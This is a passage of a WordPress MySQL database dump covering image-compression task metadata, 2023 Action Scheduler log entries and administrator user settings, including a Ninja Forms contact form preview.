path\";}'),(931,931,'task_options','a:15:{s:18:\"allowed_file_types\";s:77:\"a:5:{i:0;s:3:\"gif\";i:1;s:3:\"png\";i:2;s:3:\"jpg\";i:3;s:3:\"tif\";i:4;s:4:\"jpeg\";}\";s:15:\"request_timeout\";i:30;s:13:\"keep_original\";s:1:\"1\";s:13:\"preserve_exif\";s:0:\"\";s:13:\"image_quality\";s:3:\"100\";s:12:\"api_endpoint\";s:22:\"http://api.resmush.it/\";s:12:\"max_filesize\";i:5242880;s:7:\"version\";s:6:\"0.1.13\";s:13:\"backup_prefix\";s:28:\"-updraft-pre-smush-original.\";s:13:\"attachment_id\";i:268998;s:7:\"blog_id\";i:1;s:17:\"lossy_compression\";s:0:\"\";s:13:\"current_stage\";s:11:\"initialised\";s:10:\"error_code\";s:17:\"invalid_file_path\";s:13:\"error_message\";s:56:\"The linked attachment ID does not have a valid file path\";}'),(932,932,'task_options','a:15:{s:18:\"allowed_file_types\";s:77:\"a:5:{i:0;s:3:\"gif\";i:1;s:3:\"png\";i:2;s:3:\"jpg\";i:3;s:3:\"tif\";i:4;s:4:\"jpeg\";}\";s:15:\"request_timeout\";i:30;s:13:\"keep_original\";s:1:\"1\";s:13:\"preserve_exif\";s:0:\"\";s:13:\"image_quality\";s:3:\"100\";s:12:\"api_endpoint\";s:22:\"http://api.resmush.it/\";s:12:\"max_filesize\";i:5242880;s:7:\"version\";s:6:\"0.1.13\";s:13:\"backup_prefix\";s:28:\"-updraft-pre-smush-original.\";s:13:\"attachment_id\";i:269000;s:7:\"blog_id\";i:1;s:17:\"lossy_compression\";s:0:\"\";s:13:\"current_stage\";s:11:\"initialised\";s:10:\"error_code\";s:17:\"invalid_file_path\";s:13:\"error_message\";s:56:\"The linked attachment ID does not have a valid file path\";}'),(959,959,'task_options','a:15:{s:18:\"allowed_file_types\";s:77:\"a:5:{i:0;s:3:\"gif\";i:1;s:3:\"png\";i:2;s:3:\"jpg\";i:3;s:3:\"tif\";i:4;s:4:\"jpeg\";}\";s:15:\"request_timeout\";i:30;s:13:\"keep_original\";s:1:\"1\";s:13:\"preserve_exif\";s:0:\"\";s:13:\"image_quality\";s:3:\"100\";s:12:\"api_endpoint\";s:22:\"http://api.resmush.it/\";s:12:\"max_filesize\";i:5242880;s:7:\"version\";s:6:\"0.1.13\";s:13:\"backup_prefix\";s:28:\"-updraft-pre-smush-original.\";s:13:\"attachment_id\";i:269327;s:7:\"blog_id\";i:1;s:17:\"lossy_compression\";s:0:\"\";s:13:\"current_stage\";s:11:\"initialised\";s:10:\"error_code\";s:17:\"invalid_file_path\";s:13:\"error_message\";s:56:\"The linked attachment ID does not have a valid file path\";}'),(961,961,'task_options','a:16:{s:18:\"allowed_file_types\";s:77:\"a:5:{i:0;s:3:\"gif\";i:1;s:3:\"png\";i:2;s:3:\"jpg\";i:3;s:3:\"tif\";i:4;s:4:\"jpeg\";}\";s:15:\"request_timeout\";i:30;s:13:\"keep_original\";s:1:\"1\";s:13:\"preserve_exif\";s:0:\"\";s:13:\"image_quality\";s:3:\"100\";s:12:\"api_endpoint\";s:22:\"http://api.resmush.it/\";s:12:\"max_filesize\";i:5242880;s:7:\"version\";s:6:\"0.1.13\";s:13:\"backup_prefix\";s:28:\"-updraft-pre-smush-original.\";s:13:\"attachment_id\";i:269331;s:7:\"blog_id\";i:1;s:17:\"lossy_compression\";s:0:\"\";s:13:\"current_stage\";s:12:\"saving_image\";s:17:\"original_filesize\";i:87102;s:10:\"error_code\";s:17:\"invalid_file_path\";s:13:\"error_message\";s:56:\"The linked attachment ID does not have a valid file path\";}');
/*!40000 ALTER TABLE `wpcl_tm_taskmeta` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_tm_taskmeta` with 8 row(s)
--

--
-- Table structure for table `wpcl_actionscheduler_logs`
--

DROP TABLE IF EXISTS `wpcl_actionscheduler_logs`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_actionscheduler_logs` (
  `log_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `action_id` bigint(20) unsigned NOT NULL,
  `message` text NOT NULL,
  `log_date_gmt` datetime DEFAULT '0000-00-00 00:00:00',
  `log_date_local` datetime DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`log_id`),
  KEY `action_id` (`action_id`),
  KEY `log_date_gmt` (`log_date_gmt`)
) ENGINE=MyISAM AUTO_INCREMENT=2501 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_actionscheduler_logs`
--

LOCK TABLES `wpcl_actionscheduler_logs` WRITE;
/*!40000 ALTER TABLE `wpcl_actionscheduler_logs` DISABLE KEYS */;
INSERT INTO `wpcl_actionscheduler_logs` VALUES (2467,261383,'action failed via WP Cron: Scheduled action for action_scheduler/migration_hook will not be executed as no callbacks are registered.','2023-10-25 19:26:29','2023-10-25 13:26:29'),(2466,261383,'action started via WP Cron','2023-10-25 19:26:29','2023-10-25 13:26:29'),(2465,261383,'action created','2023-10-25 19:25:19','2023-10-25 13:25:19'),(2464,261382,'action complete via Async Request','2023-10-25 19:25:19','2023-10-25 13:25:19'),(2463,261382,'action started via Async Request','2023-10-25 19:25:19','2023-10-25 13:25:19'),(2462,261382,'action created','2023-10-25 19:23:15','2023-10-25 13:23:15'),(2459,261381,'action created','2023-10-24 16:03:30','2023-10-24 10:03:30'),(2460,261381,'action started via Async Request','2023-10-24 16:04:40','2023-10-24 10:04:40'),(2461,261381,'action failed via Async Request: Scheduled action for action_scheduler/migration_hook will not be executed as no callbacks are registered.','2023-10-24 16:04:40','2023-10-24 10:04:40'),(2458,261380,'action complete via Async Request','2023-10-24 16:03:29','2023-10-24 10:03:29'),(2456,261380,'action created','2023-10-24 16:02:27','2023-10-24 10:02:27'),(2457,261380,'action started via Async Request','2023-10-24 16:03:29','2023-10-24 10:03:29'),(2468,261384,'action created','2023-11-07 16:51:45','2023-11-07 09:51:45'),(2469,261384,'action started via Async Request','2023-11-07 16:52:58','2023-11-07 09:52:58'),(2470,261384,'action complete via Async Request','2023-11-07 16:52:58','2023-11-07 09:52:58'),(2453,261379,'action created','2023-10-24 15:57:18','2023-10-24 09:57:18'),(2454,261379,'action started via Async Request','2023-10-24 15:58:56','2023-10-24 09:58:56'),(2455,261379,'action failed via Async Request: Scheduled action for action_scheduler/migration_hook will not be executed as no callbacks are registered.','2023-10-24 15:58:56','2023-10-24 09:58:56'),(2452,261378,'action complete via Async Request','2023-10-24 15:57:17','2023-10-24 09:57:17'),(2442,261375,'action started via WP Cron','2023-09-21 14:47:02','2023-09-21 08:47:02'),(2443,261375,'action failed via WP Cron: Scheduled action for action_scheduler/migration_hook will not be executed as no callbacks are registered.','2023-09-21 14:47:02','2023-09-21 08:47:02'),(2441,261375,'action created','2023-09-20 17:04:22','2023-09-20 11:04:22'),(2437,261373,'action failed via Async Request: Scheduled action for action_scheduler/migration_hook will not be executed as no callbacks are registered.','2023-07-19 21:13:16','2023-07-19 15:13:16'),(2436,261373,'action started via Async Request','2023-07-19 21:13:16','2023-07-19 15:13:16'),(2435,261373,'action created','2023-07-19 21:12:13','2023-07-19 15:12:13'),(2450,261378,'action created','2023-10-24 15:56:14','2023-10-24 09:56:14'),(2451,261378,'action started via Async Request','2023-10-24 15:57:17','2023-10-24 09:57:17'),(2471,261385,'action created','2023-11-12 03:59:38','2023-11-11 20:59:38'),(2472,261385,'action started via Async Request','2023-11-12 04:00:41','2023-11-11 21:00:41'),(2473,261385,'action complete via Async Request','2023-11-12 04:00:41','2023-11-11 21:00:41'),(2474,261386,'action created','2023-11-12 04:00:42','2023-11-11 21:00:42'),(2475,261386,'action started via Async Request','2023-11-12 04:02:53','2023-11-11 21:02:53'),(2476,261386,'action failed via Async Request: Scheduled action for action_scheduler/migration_hook will not be executed as no callbacks are registered.','2023-11-12 04:02:53','2023-11-11 21:02:53'),(2477,261387,'action created','2023-11-14 21:10:32','2023-11-14 14:10:32'),(2478,261387,'action started via WP Cron','2023-11-14 21:11:33','2023-11-14 14:11:33'),(2479,261387,'action complete via WP Cron','2023-11-14 21:11:33','2023-11-14 14:11:33'),(2480,261388,'action created','2023-11-14 21:11:33','2023-11-14 14:11:33'),(2481,261388,'action started via WP Cron','2023-11-14 21:13:00','2023-11-14 14:13:00'),(2482,261388,'action failed via WP Cron: Scheduled action for action_scheduler/migration_hook will not be executed as no callbacks are registered.','2023-11-14 21:13:00','2023-11-14 14:13:00'),(2483,261389,'action created','2023-11-14 21:22:27','2023-11-14 14:22:27'),(2484,261389,'action started via Async Request','2023-11-14 21:23:28','2023-11-14 14:23:28'),(2485,261389,'action complete via Async Request','2023-11-14 21:23:28','2023-11-14 14:23:28'),(2486,261390,'action created','2023-11-14 21:23:28','2023-11-14 14:23:28'),(2487,261390,'action started via Async Request','2023-11-14 21:24:37','2023-11-14 14:24:37'),(2488,261390,'action failed via Async Request: Scheduled action for action_scheduler/migration_hook will not be executed as no callbacks are registered.','2023-11-14 21:24:37','2023-11-14 14:24:37'),(2489,261391,'action created','2023-11-14 22:00:28','2023-11-14 15:00:28'),(2490,261391,'action started via Async Request','2023-11-14 22:01:44','2023-11-14 15:01:44'),(2491,261391,'action complete via Async Request','2023-11-14 22:01:44','2023-11-14 15:01:44'),(2492,261392,'action created','2023-11-14 22:01:44','2023-11-14 15:01:44'),(2493,261392,'action started via Async Request','2023-11-14 22:03:10','2023-11-14 15:03:10'),(2494,261392,'action failed via Async Request: Scheduled action for action_scheduler/migration_hook will not be executed as no callbacks are registered.','2023-11-14 22:03:10','2023-11-14 15:03:10'),(2495,261393,'action created','2023-11-15 17:06:11','2023-11-15 10:06:11'),(2496,261393,'action started via Async Request','2023-11-15 17:07:12','2023-11-15 10:07:12'),(2497,261393,'action complete via Async Request','2023-11-15 17:07:12','2023-11-15 10:07:12'),(2498,261394,'action created','2023-11-15 17:07:13','2023-11-15 10:07:13'),(2499,261394,'action started via WP Cron','2023-11-15 17:08:40','2023-11-15 10:08:40'),(2500,261394,'action failed via WP Cron: Scheduled action for action_scheduler/migration_hook will not be executed as no callbacks are registered.','2023-11-15 17:08:40','2023-11-15 10:08:40');
/*!40000 ALTER TABLE `wpcl_actionscheduler_logs` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_actionscheduler_logs` with 57 row(s)
--

--
-- Table structure for table `wpcl_usermeta`
--

DROP TABLE IF EXISTS `wpcl_usermeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_usermeta` (
  `umeta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`umeta_id`),
  KEY `user_id` (`user_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=MyISAM AUTO_INCREMENT=3780 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_usermeta`
--

LOCK TABLES `wpcl_usermeta` WRITE;
/*!40000 ALTER TABLE `wpcl_usermeta` DISABLE KEYS */;
INSERT INTO `wpcl_usermeta` VALUES (64,2,'nickname','S8zhaBda'),(65,2,'first_name',''),(66,2,'last_name',''),(67,2,'description',''),(68,2,'rich_editing','true'),(69,2,'syntax_highlighting','true'),(70,2,'comment_shortcuts','false'),(71,2,'admin_color','fresh'),(72,2,'use_ssl','0'),(73,2,'show_admin_bar_front','true'),(74,2,'locale',''),(75,2,'wpcl_capabilities','a:1:{s:13:\"administrator\";b:1;}'),(76,2,'wpcl_user_level','10'),(77,2,'dismissed_wp_pointers','wp410_dfw,theme_editor_notice,black_studio_tinymce_widget,boldgrid_image_search_internal_only_8,boldgrid_media_library_image_search_internal_only,popup-editor-1,popup-editor-6,popup-editor-5,popup-editor-4,all-popups-1,popup-editor-2,popup-editor-3,all-popups-2,all-popups-4,all-popups-3'),(79,2,'first_login','2019-07-19 20:29:18'),(80,2,'last_login','2022-08-01 15:59:06'),(81,2,'hesh_surveyNoticeDismissedB',''),(82,2,'hesh_theme','default'),(83,2,'hesh_tabSize','4'),(84,2,'hesh_lineWrapping','1'),(85,2,'hesh_lineNumbers','1'),(86,2,'hesh_fontSize','13'),(87,2,'hesh_lineHeight','1.5'),(88,2,'hesh_matchBrackets',''),(89,2,'hesh_matchTags',''),(90,2,'hesh_highlightSelectionMatches',''),(91,2,'hesh_autoCloseTags',''),(92,2,'hesh_autoCloseBrackets',''),(93,2,'hesh_foldGutter',''),(94,2,'hesh_scrollbarStyle',''),(95,2,'hesh_keyMap','default'),(96,2,'wpcl_dashboard_quick_press_last_post_id','269386'),(97,2,'community-events-location','a:1:{s:2:\"ip\";s:12:\"76.130.120.0\";}'),(98,2,'wpcl_user-settings','libraryContent=browse&editor=tinymce&imgsize=full&urlbutton=none&align=center&post_dfw=off&advImgDetails=show&posts_list_mode=list&hidetb=1&editor_fullscreen=off&editor_plain_text_paste_warning=2&editor_expand=on&ed_size=360'),(99,2,'wpcl_user-settings-time','1700584268'),(101,2,'closedpostboxes_dashboard','a:0:{}'),(102,2,'metaboxhidden_dashboard','a:7:{i:0;s:22:\"boldgrid-notifications\";i:1;s:18:\"dashboard_activity\";i:2;s:24:\"mec_widget_news_features\";i:3;s:25:\"mec_widget_total_bookings\";i:4;s:20:\"boldgrid_news_widget\";i:5;s:21:\"dashboard_quick_press\";i:6;s:17:\"dashboard_primary\";}'),(106,2,'nav_menu_recently_edited','63'),(107,2,'managenav-menuscolumnshidden','a:4:{i:0;s:15:\"title-attribute\";i:1;s:11:\"css-classes\";i:2;s:3:\"xfn\";i:3;s:11:\"description\";}'),(108,2,'metaboxhidden_nav-menus','a:5:{i:0;s:22:\"add-post-type-bg_block\";i:1;s:25:\"add-post-type-tribe_venue\";i:2;s:29:\"add-post-type-tribe_organizer\";i:3;s:26:\"add-post-type-tribe_events\";i:4;s:12:\"add-post_tag\";}'),(109,2,'tribe_setDefaultNavMenuBoxes','1'),(124,2,'show_welcome_panel','0'),(128,2,'closedpostboxes_page','a:4:{i:0;s:8:\"passster\";i:1;s:30:\"nf_admin_metaboxes_appendaform\";i:2;s:12:\"postimagediv\";i:3;s:23:\"wpcode-metabox-snippets\";}'),(129,2,'metaboxhidden_page','a:5:{i:0;s:10:\"wpXSG-meta\";i:1;s:17:\"scripts-to-footer\";i:2;s:7:\"slugdiv\";i:3;s:9:\"authordiv\";i:4;s:23:\"wpcode-metabox-snippets\";}'),(171,2,'closedpostboxes_responsive_accordion','a:0:{}'),(172,2,'metaboxhidden_responsive_accordion','a:5:{i:0;s:16:\"accordion_follow\";i:1;s:16:\"accordion_rateus\";i:2;s:7:\"slugdiv\";i:3;s:27:\"accordion_more_free_plugins\";i:4;s:18:\"accordion_more_pro\";}'),(192,2,'wpcl_media_library_mode','list'),(272,5,'nickname','emerg-user18'),(273,5,'first_name',''),(274,5,'last_name',''),(275,5,'description',''),(276,5,'rich_editing','true'),(277,5,'syntax_highlighting','true'),(278,5,'comment_shortcuts','false'),(279,5,'admin_color','fresh'),(280,5,'use_ssl','0'),(281,5,'show_admin_bar_front','true'),(282,5,'locale',''),(283,5,'wpcl_capabilities','a:1:{s:13:\"administrator\";b:1;}'),(284,5,'wpcl_user_level','10'),(285,5,'dismissed_wp_pointers',',wp410_dfw'),(288,2,'sgg-tutorial_was_showed','1'),(291,2,'_pum_dismissed_alerts','a:2:{s:13:\"pum_tip_alert\";i:1622773530;s:20:\"pum_telemetry_notice\";b:1;}'),(296,2,'bglibDashboardOrder','1'),(323,2,'_pum_reviews_dismissed_triggers','a:1:{s:14:\"time_installed\";s:2:\"30\";}'),(324,2,'_pum_reviews_last_dismissed','2020-01-16 10:41:15'),(413,2,'closedpostboxes_tribe_events','a:1:{i:0;s:12:\"revisionsdiv\";}'),(414,2,'metaboxhidden_tribe_events','a:1:{i:0;s:7:\"slugdiv\";}'),(452,2,'_pum_reviews_already_did','1'),(453,2,'boldgrid_dismissed_admin_notices','a:2:{s:2:\"id\";s:23:\"boldgrid_backup_renamed\";s:9:\"timestamp\";i:1579203625;}'),(462,2,'wfls-last-login','1700583956'),(505,2,'manageedit-nf_subcolumnshidden','a:2:{i:0;i:491;i:1;i:481;}'),(580,2,'closedpostboxes_pdfposter','a:1:{i:0;s:13:\"demo_meta_box\";}'),(581,2,'metaboxhidden_pdfposter','a:1:{i:0;s:7:\"slugdiv\";}'),(612,2,'tribe-dismiss-notice','tribe-virtual-events'),(615,2,'edit_nf_sub_per_page','100'),(639,2,'wpcl_nf_form_preview_33','a:4:{s:2:\"id\";i:33;s:8:\"settings\";a:105:{s:5:\"title\";s:10:\"Contact Me\";s:10:\"created_at\";s:19:\"2016-08-24 16:39:20\";s:10:\"form_title\";s:10:\"Contact Me\";s:17:\"default_label_pos\";s:5:\"above\";s:10:\"show_title\";s:1:\"1\";s:14:\"clear_complete\";s:1:\"1\";s:13:\"hide_complete\";s:1:\"1\";s:9:\"logged_in\";s:1:\"0\";s:7:\"seq_num\";N;s:3:\"key\";s:0:\"\";s:10:\"conditions\";a:0:{}s:10:\"objectType\";s:12:\"Form Setting\";s:10:\"editActive\";s:0:\"\";s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:10:\"add_submit\";s:1:\"1\";s:17:\"not_logged_in_msg\";s:0:\"\";s:16:\"sub_limit_number\";s:0:\"\";s:13:\"sub_limit_msg\";s:0:\"\";s:12:\"calculations\";a:0:{}s:15:\"formContentData\";a:6:{i:0;s:4:\"name\";i:1;s:5:\"email\";i:2;s:26:\"listcheckbox_1596492165694\";i:3;s:7:\"message\";i:4;s:6:\"submit\";i:5;s:26:\"listcheckbox_1596492159677\";}s:33:\"container_styles_background-color\";s:0:\"\";s:23:\"container_styles_border\";s:0:\"\";s:29:\"container_styles_border-style\";s:0:\"\";s:29:\"container_styles_border-color\";s:0:\"\";s:22:\"container_styles_color\";s:0:\"\";s:23:\"container_styles_height\";s:0:\"\";s:22:\"container_styles_width\";s:0:\"\";s:26:\"container_styles_font-size\";s:0:\"\";s:23:\"container_styles_margin\";s:0:\"\";s:24:\"container_styles_padding\";s:0:\"\";s:24:\"container_styles_display\";s:0:\"\";s:22:\"container_styles_float\";s:0:\"\";s:34:\"container_styles_show_advanced_css\";s:1:\"0\";s:25:\"container_styles_advanced\";s:0:\"\";s:29:\"title_styles_background-color\";s:0:\"\";s:19:\"title_styles_border\";s:0:\"\";s:25:\"title_styles_border-style\";s:0:\"\";s:25:\"title_styles_border-color\";s:0:\"\";s:18:\"title_styles_color\";s:0:\"\";s:19:\"title_styles_height\";s:0:\"\";s:18:\"title_styles_width\";s:0:\"\";s:22:\"title_styles_font-size\";s:0:\"\";s:19:\"title_styles_margin\";s:0:\"\";s:20:\"title_styles_padding\";s:0:\"\";s:20:\"title_styles_display\";s:0:\"\";s:18:\"title_styles_float\";s:0:\"\";s:30:\"title_styles_show_advanced_css\";s:1:\"0\";s:21:\"title_styles_advanced\";s:0:\"\";s:27:\"row_styles_background-color\";s:0:\"\";s:17:\"row_styles_border\";s:0:\"\";s:23:\"row_styles_border-style\";s:0:\"\";s:23:\"row_styles_border-color\";s:0:\"\";s:16:\"row_styles_color\";s:0:\"\";s:17:\"row_styles_height\";s:0:\"\";s:16:\"row_styles_width\";s:0:\"\";s:20:\"row_styles_font-size\";s:0:\"\";s:17:\"row_styles_margin\";s:0:\"\";s:18:\"row_styles_padding\";s:0:\"\";s:18:\"row_styles_display\";s:0:\"\";s:28:\"row_styles_show_advanced_css\";s:1:\"0\";s:19:\"row_styles_advanced\";s:0:\"\";s:31:\"row-odd_styles_background-color\";s:0:\"\";s:21:\"row-odd_styles_border\";s:0:\"\";s:27:\"row-odd_styles_border-style\";s:0:\"\";s:27:\"row-odd_styles_border-color\";s:0:\"\";s:20:\"row-odd_styles_color\";s:0:\"\";s:21:\"row-odd_styles_height\";s:0:\"\";s:20:\"row-odd_styles_width\";s:0:\"\";s:24:\"row-odd_styles_font-size\";s:0:\"\";s:21:\"row-odd_styles_margin\";s:0:\"\";s:22:\"row-odd_styles_padding\";s:0:\"\";s:22:\"row-odd_styles_display\";s:0:\"\";s:32:\"row-odd_styles_show_advanced_css\";s:1:\"0\";s:23:\"row-odd_styles_advanced\";s:0:\"\";s:35:\"success-msg_styles_background-color\";s:0:\"\";s:25:\"success-msg_styles_border\";s:0:\"\";s:31:\"success-msg_styles_border-style\";s:0:\"\";s:31:\"success-msg_styles_border-color\";s:0:\"\";s:24:\"success-msg_styles_color\";s:0:\"\";s:25:\"success-msg_styles_height\";s:0:\"\";s:24:\"success-msg_styles_width\";s:0:\"\";s:28:\"success-msg_styles_font-size\";s:0:\"\";s:25:\"success-msg_styles_margin\";s:0:\"\";s:26:\"success-msg_styles_padding\";s:0:\"\";s:26:\"success-msg_styles_display\";s:0:\"\";s:36:\"success-msg_styles_show_advanced_css\";s:1:\"0\";s:27:\"success-msg_styles_advanced\";s:0:\"\";s:33:\"error_msg_styles_background-color\";s:0:\"\";s:23:\"error_msg_styles_border\";s:0:\"\";s:29:\"error_msg_styles_border-style\";s:0:\"\";s:29:\"error_msg_styles_border-color\";s:0:\"\";s:22:\"error_msg_styles_color\";s:0:\"\";s:23:\"error_msg_styles_height\";s:0:\"\";s:22:\"error_msg_styles_width\";s:0:\"\";s:26:\"error_msg_styles_font-size\";s:0:\"\";s:23:\"error_msg_styles_margin\";s:0:\"\";s:24:\"error_msg_styles_padding\";s:0:\"\";s:24:\"error_msg_styles_display\";s:0:\"\";s:34:\"error_msg_styles_show_advanced_css\";s:1:\"0\";s:25:\"error_msg_styles_advanced\";s:0:\"\";s:17:\"allow_public_link\";i:0;s:10:\"embed_form\";s:0:\"\";s:8:\"currency\";s:0:\"\";s:18:\"unique_field_error\";s:50:\"A form with this value has already been submitted.\";}s:6:\"fields\";a:6:{i:297;a:1:{s:8:\"settings\";a:76:{s:5:\"label\";s:4:\"Name\";s:3:\"key\";s:4:\"name\";s:9:\"parent_id\";s:2:\"33\";s:4:\"type\";s:7:\"textbox\";s:10:\"created_at\";s:19:\"2016-08-24 16:39:20\";s:9:\"label_pos\";s:5:\"above\";s:8:\"required\";s:1:\"1\";s:5:\"order\";i:1;s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:15:\"container_class\";s:0:\"\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:10:\"characters\";s:15:\"input_limit_msg\";s:17:\"Character(s) left\";s:10:\"manual_key\";s:0:\"\";s:13:\"disable_input\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:28:\"disable_browser_autocomplete\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:28:\"wrap_styles_background-color\";s:0:\"\";s:18:\"wrap_styles_border\";s:0:\"\";s:24:\"wrap_styles_border-style\";s:0:\"\";s:24:\"wrap_styles_border-color\";s:0:\"\";s:17:\"wrap_styles_color\";s:0:\"\";s:18:\"wrap_styles_height\";s:0:\"\";s:17:\"wrap_styles_width\";s:0:\"\";s:21:\"wrap_styles_font-size\";s:0:\"\";s:18:\"wrap_styles_margin\";s:0:\"\";s:19:\"wrap_styles_padding\";s:0:\"\";s:19:\"wrap_styles_display\";s:0:\"\";s:17:\"wrap_styles_float\";s:0:\"\";s:29:\"wrap_styles_show_advanced_css\";s:1:\"0\";s:20:\"wrap_styles_advanced\";s:0:\"\";s:29:\"label_styles_background-color\";s:0:\"\";s:19:\"label_styles_border\";s:0:\"\";s:25:\"label_styles_border-style\";s:0:\"\";s:25:\"label_styles_border-color\";s:0:\"\";s:18:\"label_styles_color\";s:0:\"\";s:19:\"label_styles_height\";s:0:\"\";s:18:\"label_styles_width\";s:0:\"\";s:22:\"label_styles_font-size\";s:0:\"\";s:19:\"label_styles_margin\";s:0:\"\";s:20:\"label_styles_padding\";s:0:\"\";s:20:\"label_styles_display\";s:0:\"\";s:18:\"label_styles_float\";s:0:\"\";s:30:\"label_styles_show_advanced_css\";s:1:\"0\";s:21:\"label_styles_advanced\";s:0:\"\";s:31:\"element_styles_background-color\";s:0:\"\";s:21:\"element_styles_border\";s:0:\"\";s:27:\"element_styles_border-style\";s:0:\"\";s:27:\"element_styles_border-color\";s:0:\"\";s:20:\"element_styles_color\";s:0:\"\";s:21:\"element_styles_height\";s:0:\"\";s:20:\"element_styles_width\";s:0:\"\";s:24:\"element_styles_font-size\";s:0:\"\";s:21:\"element_styles_margin\";s:0:\"\";s:22:\"element_styles_padding\";s:0:\"\";s:22:\"element_styles_display\";s:0:\"\";s:20:\"element_styles_float\";s:0:\"\";s:32:\"element_styles_show_advanced_css\";s:1:\"0\";s:23:\"element_styles_advanced\";s:0:\"\";s:7:\"cellcid\";s:5:\"c3277\";s:11:\"field_label\";s:4:\"Name\";s:9:\"field_key\";s:4:\"name\";s:21:\"custom_name_attribute\";s:0:\"\";s:23:\"personally_identifiable\";s:0:\"\";s:5:\"value\";s:0:\"\";s:14:\"drawerDisabled\";b:0;}}i:298;a:1:{s:8:\"settings\";a:67:{s:5:\"label\";s:5:\"Email\";s:3:\"key\";s:5:\"email\";s:9:\"parent_id\";s:2:\"33\";s:4:\"type\";s:5:\"email\";s:10:\"created_at\";s:19:\"2016-08-24 16:39:20\";s:9:\"label_pos\";s:5:\"above\";s:8:\"required\";s:1:\"1\";s:5:\"order\";i:2;s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:15:\"container_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:28:\"wrap_styles_background-color\";s:0:\"\";s:18:\"wrap_styles_border\";s:0:\"\";s:24:\"wrap_styles_border-style\";s:0:\"\";s:24:\"wrap_styles_border-color\";s:0:\"\";s:17:\"wrap_styles_color\";s:0:\"\";s:18:\"wrap_styles_height\";s:0:\"\";s:17:\"wrap_styles_width\";s:0:\"\";s:21:\"wrap_styles_font-size\";s:0:\"\";s:18:\"wrap_styles_margin\";s:0:\"\";s:19:\"wrap_styles_padding\";s:0:\"\";s:19:\"wrap_styles_display\";s:0:\"\";s:17:\"wrap_styles_float\";s:0:\"\";s:29:\"wrap_styles_show_advanced_css\";s:1:\"0\";s:20:\"wrap_styles_advanced\";s:0:\"\";s:29:\"label_styles_background-color\";s:0:\"\";s:19:\"label_styles_border\";s:0:\"\";s:25:\"label_styles_border-style\";s:0:\"\";s:25:\"label_styles_border-color\";s:0:\"\";s:18:\"label_styles_color\";s:0:\"\";s:19:\"label_styles_height\";s:0:\"\";s:18:\"label_styles_width\";s:0:\"\";s:22:\"label_styles_font-size\";s:0:\"\";s:19:\"label_styles_margin\";s:0:\"\";s:20:\"label_styles_padding\";s:0:\"\";s:20:\"label_styles_display\";s:0:\"\";s:18:\"label_styles_float\";s:0:\"\";s:30:\"label_styles_show_advanced_css\";s:1:\"0\";s:21:\"label_styles_advanced\";s:0:\"\";s:31:\"element_styles_background-color\";s:0:\"\";s:21:\"element_styles_border\";s:0:\"\";s:27:\"element_styles_border-style\";s:0:\"\";s:27:\"element_styles_border-color\";s:0:\"\";s:20:\"element_styles_color\";s:0:\"\";s:21:\"element_styles_height\";s:0:\"\";s:20:\"element_styles_width\";s:0:\"\";s:24:\"element_styles_font-size\";s:0:\"\";s:21:\"element_styles_margin\";s:0:\"\";s:22:\"element_styles_padding\";s:0:\"\";s:22:\"element_styles_display\";s:0:\"\";s:20:\"element_styles_float\";s:0:\"\";s:32:\"element_styles_show_advanced_css\";s:1:\"0\";s:23:\"element_styles_advanced\";s:0:\"\";s:7:\"cellcid\";s:5:\"c3281\";s:11:\"field_label\";s:5:\"Email\";s:9:\"field_key\";s:5:\"email\";s:21:\"custom_name_attribute\";s:5:\"email\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}}i:299;a:1:{s:8:\"settings\";a:75:{s:5:\"label\";s:7:\"Message\";s:3:\"key\";s:7:\"message\";s:9:\"parent_id\";s:2:\"33\";s:4:\"type\";s:8:\"textarea\";s:10:\"created_at\";s:19:\"2016-08-24 16:39:20\";s:9:\"label_pos\";s:5:\"above\";s:8:\"required\";s:1:\"1\";s:5:\"order\";i:4;s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:15:\"container_class\";s:0:\"\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:10:\"characters\";s:15:\"input_limit_msg\";s:17:\"Character(s) 